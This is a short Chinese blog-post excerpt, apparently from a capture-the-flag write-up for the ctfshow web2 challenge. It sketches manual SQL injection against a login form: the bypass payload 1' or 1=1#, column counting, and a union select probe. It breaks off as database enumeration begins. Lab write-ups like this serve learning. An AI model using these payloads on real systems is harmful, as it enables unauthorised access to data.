摘要: ctfshow-web2 提示: 最简单的SQL注入 手工注入 用万能密码1' or 1=1#,登陆成功 判断字段数,select 1,2,3有回显,select 1,2,3,4时无回显,说明字段为3 1' or 1=1 union select 1,2,3 # 爆数据库,当前数据库为web2 1' 阅读全文
posted @ 2020-11-16 16:37 atkx 阅读(432) 评论(0) 推荐(0) 编辑